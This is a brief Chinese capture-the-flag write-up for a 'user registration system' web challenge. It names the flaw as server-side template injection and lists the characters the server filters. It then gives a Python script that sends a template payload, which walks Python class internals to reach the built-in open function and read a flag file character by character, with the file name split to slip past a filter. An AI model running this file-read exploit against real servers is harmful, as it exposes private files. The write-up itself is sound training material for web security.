W | 用户登记系统 | Chu0
题目说明
题目附件:
解题思路
ssti,最终结果数组一个一个读取,前面加了500多个垃圾字符,过滤了空格,\,<,>,+,?,/,|,$,*,',"
import requests
url = 'http://116.63.134.105/index.php'
ii = ''
for i in range(500,10000):
test = 'name={{"".__class__.__base__.__subclasses__()[103].__init__.__globals__.__builtins__["open"]("/tmp/fla""g").read()[%d]}}' % i
data = {
"name":test
}
r= requests.post(url,data)
ii+=r.text[13]
print(ii)
print(ii)